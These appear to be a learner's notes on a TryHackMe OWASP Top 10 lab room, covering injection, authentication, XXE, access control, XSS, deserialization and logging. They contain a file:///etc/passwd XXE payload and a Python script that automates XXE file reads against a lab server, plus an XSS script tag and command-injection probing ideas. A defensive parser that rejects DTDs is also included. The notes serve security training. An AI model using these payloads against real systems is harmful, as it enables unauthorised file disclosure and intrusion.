OWASP Top 10 TryHackMe

[Day 1] Injection

  1. Run a sleep command and measure the web server's response time
  2. Run a ping command that makes the vulnerable server ping back to your box
  3. Direct the output (stdout) of a command to a file in a directory that you control, such as /var/www/html, and check whether you can access the file

[Day 2] Broken Authentication

  1. For example, a server is vulnerable to SQL Injection, meaning an attacker can dump the contents of the database, which might include password hashes, crack them, and get access to the system using those credentials
  2. The second scenario is that a user's password is so weak that a brute-force attack can easily guess it, which leads to compromise of the system
  3. The third scenario is that the web server assigns weak session IDs, meaning that an attacker, with a little fuzzing, can reverse the session ID scheme and create countless more valid session IDs
  4. And many more; I can't explain all of them for now

[Day 3] Sensitive Data Exposure

sqlitebrowser webapp.db

[Day 4] XML External Entity

  1. Local File Inclusion
  2. Remote Code Execution
  3. Server Side Request Forgery
  4. Cross Site Request Forgery
  5. And many more vulnerabilities
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
import requests
import re
import sys

# ANSI colour codes for the prompt and the printed file contents
class bcolors:
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    ENDC = '\033[0m'

sess = requests.session()
IPAddress = sys.argv[1]  # IP address of the lab machine, given on the command line

while True:
    # The colour reset belongs to the prompt, not to the file name
    filename = input(bcolors.OKBLUE + "Enter the name file you want to view > " + bcolors.ENDC)
    payload = """<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file://"""
    payload += filename
    payload += """ '>]><root>&test;</root>"""
    url = "http://" + IPAddress + "/home"
    postdata = {
        "xxe" : payload
    }
    output = sess.post(url, data=postdata).text
    # The expanded entity is reflected between </main> and <center>
    begin = output.find("</main>")
    end = output.find("<center>")
    out = output[begin :end]
    file = re.sub("</main>", "", out).strip()
    print (bcolors.OKGREEN + file + bcolors.ENDC)
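
The defensive counterpart to the payloads above, as an added example that is not part of the original writeup: a parser wrapper that aborts on any DOCTYPE, so neither the internal "Doe" entity nor the file:// external entity is ever processed. The names parse_untrusted, ForbiddenXML and is_rejected are illustrative assumptions, and the <name> element and the benign document are constructed sample input.

```python
import xml.parsers.expat as expat


class ForbiddenXML(ValueError):
    """Raised when untrusted XML carries a DTD or entity feature."""


def parse_untrusted(xml_text):
    """Parse XML from an untrusted client and return (root_tag, text).

    A DOCTYPE, entity declaration or external entity reference aborts
    parsing before any entity is expanded or any file/URL is read.
    Malformed XML still raises expat.ExpatError for the caller to handle.
    """
    parser = expat.ParserCreate()
    tags, chunks = [], []

    def forbid(reason):
        def handler(*_args):
            raise ForbiddenXML(reason + " is not allowed")
        return handler

    parser.StartDoctypeDeclHandler = forbid("DOCTYPE declaration")
    parser.EntityDeclHandler = forbid("entity declaration")
    parser.ExternalEntityRefHandler = forbid("external entity reference")
    parser.StartElementHandler = lambda name, attrs: tags.append(name)
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_text, True)
    return tags[0], "".join(chunks).strip()


def is_rejected(xml_text):
    """True if the document is refused because of a DTD/entity feature."""
    try:
        parse_untrusted(xml_text)
    except ForbiddenXML:
        return True
    return False


# External-entity payload exactly as shown on this page.
EXTERNAL_ENTITY = """<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>"""
# The page's internal-entity DOCTYPE, with a constructed <name> element using it.
INTERNAL_ENTITY = '<?xml version="1.0" ?><!DOCTYPE replace [<!ENTITY example "Doe"> ]><name>&example;</name>'
# Constructed benign document with no DTD.
BENIGN = '<?xml version="1.0"?><root>Doe</root>'

if __name__ == "__main__":
    for label, doc in [("external", EXTERNAL_ENTITY), ("internal", INTERNAL_ENTITY), ("benign", BENIGN)]:
        print(label, "rejected" if is_rejected(doc) else parse_untrusted(doc))
```

Rejecting the DOCTYPE outright is stricter than disabling external entities only; it suits endpoints like this one where clients have no reason to send a DTD.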

[Day 5] Broken Access Control

  1. A cookie (a unique identifier string used to identify you and give you access to restricted pages )
  2. A session ID or phpsessid which does the same function as a cookie
0 and 1
  -c specifies that the output should have colors (since colors are awesome)
  --hh tells wfuzz not to show us pages with 0 characters (this is because if we put a random payload the webpage returns blank)
  -z range,0-100 makes wfuzz generate numbers from zero to 100 and then use them as the payload
  Finally, the URL where we've inserted FUZZ in caps tells wfuzz to put our payload there
  1. index.php
  2. note.php (remember, we were not supposed to be able to view note.php without creds, yet we can, even though we haven’t supplied any credentials)

[Day 6] Security Misconfiguration

1. readme.txt
2. http[s]://url/docs
3. http[s]://url/documentation
4. changelog.txt
5. The good old way: online documentation
6. README.md


unmodified response
modified response

[Day 7] Cross-site Scripting

<b>Coding Rocks</b>
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

[Day 8] Insecure Deserialization

  1. Python
  2. PHP
  3. Java
  4. NodeJS

Insecure Deserialization cookies


Insecure Deserialization Remote Code Execution

[Day 9] Components with Known Vulnerabilities

[Day 10] Insufficient Logging & Monitoring

  1. Login attempts
  2. password changes
  3. high value transactions
  4. Failed login attempts
  5. HTTP status codes
  6. Time stamps (What page and information was accessed at what time)
  1. By ensuring that all generated logs are stored in a format that can be easily understood and grasped
  2. Ensure high-value transactions have an audit trail with integrity controls to prevent tampering or deletion, such as append-only database tables or similar
  3. Ensure all login, access control failures, and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis
  4. The application should be able to detect, escalate, or alert for active attacks in real time or near real time



